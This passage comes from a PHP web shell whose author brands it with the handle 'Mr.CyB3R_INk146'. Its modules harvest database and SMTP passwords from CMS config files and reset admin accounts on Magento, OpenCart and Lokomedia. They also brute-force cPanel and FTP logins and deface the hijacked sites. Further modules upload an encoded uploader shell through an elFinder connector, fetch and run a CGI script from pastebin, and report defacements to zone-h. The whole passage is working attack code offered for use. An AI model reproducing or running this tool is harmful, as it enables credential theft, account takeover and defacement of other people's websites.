  1131. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1132. $result = mysql_fetch_array($q);
  1133. $id = $result[user_id];
  1134. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1135. $result2 = mysql_fetch_array($q2);
  1136. $target = $result2[value];
  1137. if($target == '') {
  1138. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1139. } else {
  1140. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1141. }
  1142. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1143. echo "Config => ".$file_conf."<br>";
  1144. echo "CMS => Magento<br>";
  1145. echo $url_target;
  1146. if(!$update OR !$conn OR !$db) {
  1147. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1148. } else {
  1149. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1150. }
  1151. mysql_close($conn);
  1152. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1153. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1154. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1155. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1156. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1157. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1158. $prefix = $dbprefix."user";
  1159. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1160. $db = mysql_select_db($dbname);
  1161. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1162. $result = mysql_fetch_array($q);
  1163. $id = $result[user_id];
  1164. $target = ambilkata($config,"HTTP_SERVER', '","'");
  1165. if($target == '') {
  1166. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1167. } else {
  1168. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1169. }
  1170. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1171. echo "Config => ".$file_conf."<br>";
  1172. echo "CMS => OpenCart<br>";
  1173. echo $url_target;
  1174. if(!$update OR !$conn OR !$db) {
  1175. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1176. } else {
  1177. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1178. }
  1179. mysql_close($conn);
  1180. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1181. $dbhost = ambilkata($config,'server = "','"');
  1182. $dbuser = ambilkata($config,'username = "','"');
  1183. $dbpass = ambilkata($config,'password = "','"');
  1184. $dbname = ambilkata($config,'database = "','"');
  1185. $prefix = "users";
  1186. $option = "identitas";
  1187. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1188. $db = mysql_select_db($dbname);
  1189. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1190. $result = mysql_fetch_array($q);
  1191. $target = $result[alamat_website];
  1192. if($target == '') {
  1193. $target2 = $result[url];
  1194. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1195. if($target2 == '') {
  1196. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1197. } else {
  1198. $cek_login3 = file_get_contents("$target2/adminweb/");
  1199. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1200. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1201. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1202. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1203. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1204. } else {
  1205. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1206. }
  1207. }
  1208. } else {
  1209. $cek_login = file_get_contents("$target/adminweb/");
  1210. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1211. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1212. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1213. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1214. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1215. } else {
  1216. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1217. }
  1218. }
  1219. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1220. echo "Config => ".$file_conf."<br>";
  1221. echo "CMS => Lokomedia<br>";
  1222. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1223. echo $url_target2;
  1224. } else {
  1225. echo $url_target;
  1226. }
  1227. if(!$update OR !$conn OR !$db) {
  1228. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1229. } else {
  1230. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1231. }
  1232. mysql_close($conn);
  1233. }
  1234. }
  1235. }
  1236. } else {
  1237. echo "<center>
  1238. <h1>Auto Edit User Config</h1>
  1239. <form method='post'>
  1240. DIR Config: <br>
  1241. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1242. Set User & Pass: <br>
  1243. <input type='text' name='user_baru' value='ink' placeholder='user_baru'><br>
  1244. <input type='text' name='pass_baru' value='ink' placeholder='pass_baru'><br>
  1245. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  1246. </form>
  1247. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1248. ";
  1249. }
  1250. } elseif($_GET['do'] == 'cpanel') {
  1251. if($_POST['crack']) {
  1252. $usercp = explode("\r\n", $_POST['user_cp']);
  1253. $passcp = explode("\r\n", $_POST['pass_cp']);
  1254. $i = 0;
  1255. foreach($usercp as $ucp) {
  1256. foreach($passcp as $pcp) {
  1257. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1258. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1259. } else {
  1260. $_SESSION[$ucp] = "1";
  1261. $_SESSION[$pcp] = "1";
  1262. if($ucp == '' || $pcp == '') {
  1263.  
  1264. } else {
  1265. $i++;
  1266. if(function_exists('posix_getpwuid')) {
  1267. $domain_cp = file_get_contents("/etc/named.conf");
  1268. if($domain_cp == '') {
  1269. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  1270. } else {
  1271. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1272. foreach($domains_cp[1] as $dj) {
  1273. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1274. $user_cp_url = $user_cp_url['name'];
  1275. if($user_cp_url == $ucp) {
  1276. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  1277. break;
  1278. }
  1279. }
  1280. }
  1281. } else {
  1282. $dom = "<font color=red>function is Disable by system</font>";
  1283. }
  1284. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  1285. }
  1286. }
  1287. }
  1288. }
  1289. }
  1290. if($i == 0) {
  1291. } else {
  1292. echo "<br>sukses nyolong ".$i." Cpanel by <font color=red>Mr.CyB3R_INk146.</font>";
  1293. }
  1294. } else {
  1295. echo "<center>
  1296. <form method='post'>
  1297. USER: <br>
  1298. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1299. $_usercp = fopen("/etc/passwd","r");
  1300. while($getu = fgets($_usercp)) {
  1301. if($getu == '' || !$_usercp) {
  1302. echo "<font color=red>Can't read /etc/passwd</font>";
  1303. } else {
  1304. preg_match_all("/(.*?):x:/", $getu, $u);
  1305. foreach($u[1] as $user_cp) {
  1306. if(is_dir("/home/$user_cp/public_html")) {
  1307. echo "$user_cp\n";
  1308. }
  1309. }
  1310. }
  1311. }
  1312. echo "</textarea><br>
  1313. PASS: <br>
  1314. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1315. function cp_pass($dir) {
  1316. $pass = "";
  1317. $dira = scandir($dir);
  1318. foreach($dira as $dirb) {
  1319. if(!is_file("$dir/$dirb")) continue;
  1320. $ambil = file_get_contents("$dir/$dirb");
  1321. if(preg_match("/WordPress/", $ambil)) {
  1322. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1323. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1324. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1325. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1326. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1327. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1328. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1329. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1330. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1331. } elseif(preg_match("/^[client]$/", $ambil)) {
  1332. preg_match("/password=(.*?)/", $ambil, $pass1);
  1333. if(preg_match('/"/', $pass1[1])) {
  1334. $pass1[1] = str_replace('"', "", $pass1[1]);
  1335. $pass .= $pass1[1]."\n";
  1336. } else {
  1337. $pass .= $pass1[1]."\n";
  1338. }
  1339. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1340. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1341. }
  1342. }
  1343. echo $pass;
  1344. }
  1345. $cp_pass = cp_pass($dir);
  1346. echo $cp_pass;
  1347. echo "</textarea><br>
  1348. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1349. </form>
  1350. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1351. }
  1352. } elseif($_GET['do'] == 'cpftp_auto') {
  1353. if($_POST['crack']) {
  1354. $usercp = explode("\r\n", $_POST['user_cp']);
  1355. $passcp = explode("\r\n", $_POST['pass_cp']);
  1356. $i = 0;
  1357. foreach($usercp as $ucp) {
  1358. foreach($passcp as $pcp) {
  1359. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1360. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1361. } else {
  1362. $_SESSION[$ucp] = "1";
  1363. $_SESSION[$pcp] = "1";
  1364. if($ucp == '' || $pcp == '') {
  1365. //
  1366. } else {
  1367. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  1368. $ftp_conn = ftp_connect($ip);
  1369. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  1370. if((!$ftp_login) || (!$ftp_conn)) {
  1371. echo "[+] <font color=red>Login Gagal</font><br><br>";
  1372. } else {
  1373. echo "[+] <font color=lime>Login Sukses</font><br>";
  1374. $fi = htmlspecialchars($_POST['file_deface']);
  1375. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  1376. if($deface) {
  1377. $i++;
  1378. echo "[+] <font color=lime>Deface Sukses</font><br>";
  1379. if(function_exists('posix_getpwuid')) {
  1380. $domain_cp = file_get_contents("/etc/named.conf");
  1381. if($domain_cp == '') {
  1382. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1383. } else {
  1384. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1385. foreach($domains_cp[1] as $dj) {
  1386. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1387. $user_cp_url = $user_cp_url['name'];
  1388. if($user_cp_url == $ucp) {
  1389. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  1390. break;
  1391. }
  1392. }
  1393. }
  1394. } else {
  1395. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1396. }
  1397. } else {
  1398. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  1399. }
  1400. }
  1401. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  1402. }
  1403. }
  1404. }
  1405. }
  1406. }
  1407. if($i == 0) {
  1408. } else {
  1409. echo "<br>sukses deface ".$i." Cpanel by <font color=red>Mr.CyB3R_INk146</font>";
  1410. }
  1411. } else {
  1412. echo "<center>
  1413. <form method='post'>
  1414. Filename: <br>
  1415. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  1416. Deface Page: <br>
  1417. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  1418. USER: <br>
  1419. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1420. $_usercp = fopen("/etc/passwd","r");
  1421. while($getu = fgets($_usercp)) {
  1422. if($getu == '' || !$_usercp) {
  1423. echo "<font color=red>Can't read /etc/passwd</font>";
  1424. } else {
  1425. preg_match_all("/(.*?):x:/", $getu, $u);
  1426. foreach($u[1] as $user_cp) {
  1427. if(is_dir("/home/$user_cp/public_html")) {
  1428. echo "$user_cp\n";
  1429. }
  1430. }
  1431. }
  1432. }
  1433. echo "</textarea><br>
  1434. PASS: <br>
  1435. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1436. function cp_pass($dir) {
  1437. $pass = "";
  1438. $dira = scandir($dir);
  1439. foreach($dira as $dirb) {
  1440. if(!is_file("$dir/$dirb")) continue;
  1441. $ambil = file_get_contents("$dir/$dirb");
  1442. if(preg_match("/WordPress/", $ambil)) {
  1443. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1444. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1445. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1446. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1447. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1448. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1449. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1450. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1451. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1452. } elseif(preg_match("/client/", $ambil)) {
  1453. preg_match("/password=(.*)/", $ambil, $pass1);
  1454. if(preg_match('/"/', $pass1[1])) {
  1455. $pass1[1] = str_replace('"', "", $pass1[1]);
  1456. $pass .= $pass1[1]."\n";
  1457. }
  1458. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1459. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1460. }
  1461. }
  1462. echo $pass;
  1463. }
  1464. $cp_pass = cp_pass($dir);
  1465. echo $cp_pass;
  1466. echo "</textarea><br>
  1467. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  1468. </form>
  1469. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1470. }
  1471. } elseif($_GET['do'] == 'smtp') {
  1472. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1473. function scj($dir) {
  1474. $dira = scandir($dir);
  1475. foreach($dira as $dirb) {
  1476. if(!is_file("$dir/$dirb")) continue;
  1477. $ambil = file_get_contents("$dir/$dirb");
  1478. $ambil = str_replace("$", "", $ambil);
  1479. if(preg_match("/JConfig|joomla/", $ambil)) {
  1480. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1481. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1482. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1483. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1484. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1485. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1486. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  1487. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  1488. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  1489. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  1490. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  1491. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  1492. }
  1493. }
  1494. }
  1495. $smpt_hunter = scj($dir);
  1496. echo $smpt_hunter;
  1497. } elseif($_GET['do'] == 'auto_wp') {
  1498. if($_POST['hajar']) {
  1499. $title = htmlspecialchars($_POST['new_title']);
  1500. $pn_title = str_replace(" ", "-", $title);
  1501. if($_POST['cek_edit'] == "Y") {
  1502. $script = $_POST['edit_content'];
  1503. } else {
  1504. $script = $title;
  1505. }
  1506. $conf = $_POST['config_dir'];
  1507. $scan_conf = scandir($conf);
  1508. foreach($scan_conf as $file_conf) {
  1509. if(!is_file("$conf/$file_conf")) continue;
  1510. $config = file_get_contents("$conf/$file_conf");
  1511. if(preg_match("/WordPress/", $config)) {
  1512. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1513. $dbuser = ambilkata($config,"DB_USER', '","'");
  1514. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1515. $dbname = ambilkata($config,"DB_NAME', '","'");
  1516. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1517. $prefix = $dbprefix."posts";
  1518. $option = $dbprefix."options";
  1519. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1520. $db = mysql_select_db($dbname);
  1521. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1522. $result = mysql_fetch_array($q);
  1523. $id = $result[ID];
  1524. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1525. $result2 = mysql_fetch_array($q2);
  1526. $target = $result2[option_value];
  1527. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1528. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1529. echo "<div style='margin: 5px auto;'>";
  1530. if($target == '') {
  1531. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  1532. } else {
  1533. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1534. }
  1535. if(!$update OR !$conn OR !$db) {
  1536. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1537. } else {
  1538. echo "<font color=lime>sukses di ganti.</font><br>";
  1539. }
  1540. echo "</div>";
  1541. mysql_close($conn);
  1542. }
  1543. }
  1544. } else {
  1545. echo "<center>
  1546. <h1>Auto Edit Title+Content WordPress</h1>
  1547. <form method='post'>
  1548. DIR Config: <br>
  1549. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1550. Set Title: <br>
  1551. <input type='text' name='new_title' value='Ownd by Mr.CyB3R_INk146' placeholder='New Title'><br><br>
  1552. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1553. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  1554. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1555. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1556. </form>
  1557. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1558. ";
  1559. }
  1560. } if($_GET['do'] == 'elfinder') {
  1561. echo "<form method='post'>
  1562. Target: <br>
  1563. <textarea name='target' placeholder='http://www.target.com/elFinder/php/connector.php' style='width: 600px; height: 250px; margin: 5px auto; resize: none;'></textarea><br>
  1564. <input type='submit' name='x' style='width: 150px; height: 25px; margin: 5px;' value='hajar'>
  1565. ";
  1566. echo "</form>
  1567. ";
  1568. echo "</html>
  1569. ";
  1570. // AKBAR DRAVINKY
  1571. function ngirim($url, $isi) {
  1572. $ch = curl_init ("$url");
  1573. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  1574. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  1575. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1576. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1577. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1578. curl_setopt ($ch, CURLOPT_POST, 1);
  1579. curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
  1580. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  1581. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  1582. $data3 = curl_exec ($ch);
  1583. return $data3;
  1584. }
  1585. $target = explode("\r\n", $_POST['target']);
  1586. if($_POST['x']) {
  1587. foreach($target as $korban) {
  1588. $nama_doang = "ink.php";
  1589. $isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
  1590. $decode_isi = base64_decode($isi_nama_doang);
  1591. $encode = base64_encode($nama_doang);
  1592. $fp = fopen($nama_doang,"w");
  1593. fputs($fp, $decode_isi);
  1594. echo "[+] <a href='$korban' target='_blank'>$korban</a> <br>";
  1595. echo "# Upload[1] ......<br>";
  1596. $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
  1597. $b = file_get_contents("$url_mkfile");
  1598. $post1 = array(
  1599. "cmd" => "put",
  1600. "target" => "l1_$encode",
  1601. "content" => "$decode_isi",
  1602. );
  1603. $post2 = array(
  1604. "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
  1605. "upload[]" => "@$nama_doang",);
  1606. $output_mkfile = ngirim("$korban", $post1);
  1607. if(preg_match("/$nama_doang/", $output_mkfile)) {
  1608. echo "# Upload Success 1... => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
  1609. } else {
  1610. echo "# Upload Failed 1 <br># Uploading 2..<br>";
  1611. $upload_ah = ngirim("$korban?cmd=upload", $post2);
  1612. if(preg_match("/$nama_doang/", $upload_ah)) {
  1613. echo "# Upload Success 2 => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
  1614. } else {
  1615. echo "# Upload Failed 2<br><br>";
  1616. }
  1617. }
  1618. }
  1619. }
  1620.  
  1621. } elseif($_GET['do'] == 'zoneh') {
  1622. if($_POST['submit']) {
  1623. $domain = explode("\r\n", $_POST['url']);
  1624. $nick = $_POST['nick'];
  1625. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1626. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1627. function zoneh($url,$nick) {
  1628. $ch = curl_init("http://www.zone-h.com/notify/single");
  1629. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1630. curl_setopt($ch, CURLOPT_POST, true);
  1631. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1632. return curl_exec($ch);
  1633. curl_close($ch);
  1634. }
  1635. foreach($domain as $url) {
  1636. $zoneh = zoneh($url,$nick);
  1637. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1638. echo "$url -> <font color=lime>OK</font><br>";
  1639. } else {
  1640. echo "$url -> <font color=red>ERROR</font><br>";
  1641. }
  1642. }
  1643. } else {
  1644. echo "<center><form method='post'>
  1645. <u>Defacer</u>: <br>
  1646. <input type='text' name='nick' size='50' value='Mr.CyB3R_INk146'><br>
  1647. <u>Domains</u>: <br>
  1648. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1649. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1650. </form>";
  1651. }
  1652. echo "</center>";
  1653. } elseif($_GET['do'] == 'cgi') {
  1654. $cgi_dir = mkdir('idx_cgi', 0755);
  1655. $file_cgi = "idx_cgi/cgi.izo";
  1656. $isi_htcgi = "AddHandler cgi-script .izo";
  1657. $htcgi = fopen(".htaccess", "w");
  1658. fwrite($htcgi, $isi_htcgi);
  1659. fclose($htcgi);
  1660. $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
  1661. $cgi = fopen($file_cgi, "w");
  1662. fwrite($cgi, $cgi_script);
  1663. fclose($cgi);
  1664. chmod($file_cgi, 0755);
  1665. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1666. } elseif($_GET['do'] == 'fake_root') {
  1667. ob_start();
  1668. $cwd = getcwd();
  1669. $ambil_user = explode("/", $cwd);
  1670. $user = $ambil_user[2];
  1671. if($_POST['reverse']) {
  1672. $site = explode("\r\n", $_POST['url']);
  1673. $file = $_POST['file'];
  1674. foreach($site as $url) {
  1675. $cek = getsource("$url/~$user/$file");
  1676. if(preg_match("/hacked/i", $cek)) {
  1677. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  1678. }
  1679. }
  1680. } else {
  1681. echo "<center><form method='post'>
  1682. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1683. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1684. Domain: <br>
  1685. <textarea style='width: 450px; height: 250px;' name='url'>";
  1686. reverse($_SERVER['HTTP_HOST']);
  1687. echo "</textarea><br>
  1688. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1689. </form><br>
  1690. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1691. }
  1692. } elseif($_GET['do'] == 'adminer') {
  1693. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1694. function adminer($url, $isi) {
  1695. $fp = fopen($isi, "w");
  1696. $ch = curl_init();
  1697. curl_setopt($ch, CURLOPT_URL, $url);
  1698. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1699. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1700. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1701. curl_setopt($ch, CURLOPT_FILE, $fp);
  1702. return curl_exec($ch);
  1703. curl_close($ch);
  1704. fclose($fp);
  1705. ob_flush();
  1706. flush();
  1707. }
  1708. if(file_exists('adminer.php')) {
  1709. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1710. } else {
  1711. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1712. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1713. } else {
  1714. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1715. }
  1716. }
  1717. } elseif($_GET['do'] == 'auto_dwp') {
  1718. if($_POST['auto_deface_wp']) {
  1719. function anucurl($sites) {
  1720. $ch = curl_init($sites);
  1721. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1722. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1723. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1724. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1725. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1726. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1727. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1728. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1729. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1730. $data = curl_exec($ch);
  1731. curl_close($ch);
  1732. return $data;
  1733. }
  1734. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1735. $post = array(
  1736. "log" => "$userr",
  1737. "pwd" => "$pass",
  1738. "rememberme" => "forever",
  1739. "wp-submit" => "$wp_submit",
  1740. "redirect_to" => "$web",
  1741. "testcookie" => "1",
  1742. );
  1743. $ch = curl_init($cek);
  1744. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1745. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
